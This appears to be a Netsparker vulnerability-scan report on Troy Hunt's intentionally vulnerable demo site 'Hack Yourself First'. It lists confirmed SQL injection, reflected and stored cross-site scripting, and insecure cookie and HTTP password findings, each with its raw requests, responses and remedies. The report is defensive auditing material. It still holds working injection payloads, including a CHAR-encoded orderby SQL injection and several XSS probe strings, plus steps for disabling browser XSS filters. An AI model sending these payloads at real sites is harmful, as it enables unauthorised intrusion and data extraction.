<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT: 1 TOTAL, 1 CONFIRMED

3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session
Mounting phishing attacks
Intercepting data and performing man-in-the-middle attacks

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling

Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm=%2Bnetsparker(9)%2B

Parameters
Parameter    Type    Value
searchTerm   GET     +netsparker(9)+

Request
GET /Search?searchTerm=%2Bnetsparker(9)%2B HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">+netsparker(9)+</span>&quot;</h2>
<p class="alert alert-error">No results found for your search</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val('+netsparker(9)+');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 TOTAL, 1 CONFIRMED

4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
Users' session-sensitive information, such as cookies, can be stolen.
XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
The website can be redirected to a new location, defaced or used as a phishing site.

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3

Injection URL
http://hackyourselffirst.troyhunt.com/api/vote

Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 TOTAL, 1 CONFIRMED

5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register

Form target action
http://hackyourselffirst.troyhunt.com/Account/Register

Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 TOTAL, 1 CONFIRMED

6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy
Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login

Identified Cookie
AuthCookie

Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true

Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 TOTAL

7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Identified Version
11.0.9222.17

Latest Version
12.0.2000.0

Vulnerability Database
Result is based on 18/08/2014 vulnerability database content.

Certainty

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 TOTAL, 1 CONFIRMED

8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.

Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login

Form target action
https://hackyourselffirst.troyhunt.com/Account/Login

Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 TOTAL

9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hijacking user's active session
Changing the look of the page within the victim's browser
Mounting a successful phishing attack
Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet

External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter    Type    Value
userId       POST    1
supercarId   POST    3
comments     POST    '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Certainty

Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
